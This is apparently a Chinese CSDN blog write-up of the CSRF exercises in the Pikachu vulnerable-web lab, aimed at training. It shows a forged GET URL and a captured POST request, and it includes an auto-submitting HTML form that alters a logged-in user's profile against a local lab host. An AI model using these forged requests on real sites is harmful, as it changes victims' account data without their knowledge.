pikachu-CSRF

最新推荐文章于 2024-05-26 08:00:00 发布
最新推荐文章于 2024-05-26 08:00:00 发布
阅读量2.2k 收藏
点赞数
分类专栏: pikachu 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/123278947
版权

pikachu-CSRF

1.CSRF(GET)

在这里插入图片描述

​ 修改用户信息,使用burp抓包,伪造提交的地址

# 数据包
GET /pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=dsfsf&email=kobe%40pikachu.com1&submit=submit

# 伪造地址
http://192.168.1.150/pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=1&submit=submit

​ 用户在登陆的情况下,发送伪造的地址请求

在这里插入图片描述

2.CSRF(POST)

在这里插入图片描述

​ 使用burp伪造post数据包,并生成html页面

POST /pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php
Cookie: PHPSESSID=2n5mcduhjf22v7cvn0sljclhk4
Upgrade-Insecure-Requests: 1

sex=2222&phonenum=2222&add=2222&email=2222&submit=submit

# csrf_post.html
<!DOCTYPE html>
<html>
<head lang="en">
	<title>csrf_post</title>
	<script>
    window.onload = function() {
    document.getElementById("postsubmit").click();
  }
 </script>
</head>
<body>
       <form action="http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
       	 <input type="text" name="sex" value="2222"><br>
       	 <input type="hidden" name="phonenum" value="2222"><br>
       	 <input type="hidden" name="add" value="2222"><br>
       	 <input type="hidden" name="email" value="2222"><br>
       	 <input id="postsubmit" type="submit" name="submit" value="submit" />
       </form>
</body>

</html>

​ 用户在登陆的情况下,访问构造的csrf_post.html页面http://192.168.1.1/csrf_post.html(phpstudy搭建的)

在这里插入图片描述

小白头发少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
PikachuCSRF
weixin_48621644的博客
10-17 1906
小羊学安全 任重而道远~
pikachu平台之csrf
qq_42728977的博客
12-16 1946
概述 参考链接 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 场景例子 lucy想要在购物网站上修改购物地址,这个操作是lucy通过浏览器向后端发送了请求。...
pikachu靶场中的CSRF、SSRF通关
最新发布
qq_68163788的博客
05-26 1763
Pikachu靶场中,CSRF(Cross-Site Request Forgery)和SSRF(Server-Side Request Forgery)是两种常见的Web安全漏洞。CSRF攻击利用用户在已认证的Web应用程序上执行未经意的操作,通过伪装请求来执行恶意操作,例如更改用户密码或发送资金。而SSRF漏洞则允许攻击者从受害服务器上执行请求,可能导致访问内部系统、绕过防火墙或执行其他恶意操作。
Pikachu系列——CSRF
Zlirving_的博客
05-15 1207
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF CSRF概述 跨站请求伪造简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。 CSRF类型判断 GET: 先去掉参数尝试能否正常请求。如果可以,即存在CSRF漏洞。 POST: 如果有token等验证参数,先去掉参数尝试能否正常请求。如果可以,再去掉referer参数的内容,如果仍然可以,说
Pikachu-----CSRF(跨站请求伪造)
m0_65712192的博客
12-19 1399
Pikachu-----CSRF(跨站请求伪造)
pikachu,dvwa的csrf详细步骤
05-17
初学者可以参考
pikachu靶场环境
02-12
1. **Web安全**:理解Web应用程序的工作原理,识别常见的安全漏洞,如SQL注入、XSS、CSRF(跨站请求伪造)等,并学会利用这些漏洞进行攻击,同时也学习如何修复这些漏洞。 2. **网络协议分析**:掌握TCP/IP协议栈的...
pikachuCSRF
qq_43665434的博客
02-08 545
pikachuCSRF 文章目录pikachuCSRF一、神魔是CSRF?二、地位三、场景四、比xss何如?五、如何确认存在CSRF六、靶场测试1、CSRF(get)2、CSRF(post)3、CSRF Token七、CSRF防范措施 一、神魔是CSRF? Cross-site request forgery,跨站请求伪造,攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 二、地位
pikachu靶场练习——CSRF详解
qq_42176496的博客
09-05 2346
pikachu靶场——CSRF详解
pikachu-csrf
qq_43660551的博客
04-25 122
登录vince/123456,点修改个人信息,地址栏看不到url,用bp抓包,直接在url中修改Vince的信息,将修改过的url:xxxxxxxx/pikachu/vul/csrf/csrfget/csrf_get_edit.php?攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。三、CSRF(TOKEN)
Pikachu靶场——CSRF漏洞
知世郎
08-10 440
CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。也被称为 one-click attack 或者 session riding。
pikachu(皮卡丘)--CSRF
m0_74871683的博客
09-16 383
简要概述为1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如:--对敏感信息的操作增加安全的token;--对敏感信息的操作增加安全的验证码;
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 1117
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
十五、pikachuCSRF
qq_55202378的博客
08-27 555
pikachu CSRF
pikachu靶场-CSRF(跨站请求伪造)
qq_44655084的博客
12-30 1128
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
Pikachu靶场之CSRF漏洞详解
m0_46467017的博客
05-16 7540
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
Pikachu靶场练习——CSRF
young的博客
09-09 2220
Pikachu靶场练习——CSRF
pikachu靶场csrf
09-03
Pikachu靶场是一个用于学习和测试网络安全漏洞的平台,其中包括了针对跨站请求伪造(CSRF)漏洞的攻击和防护内容。在这个平台上,你可以学习到CSRF攻击的原理、防护方法以及如何确认一个Web系统是否存在CSRF漏洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值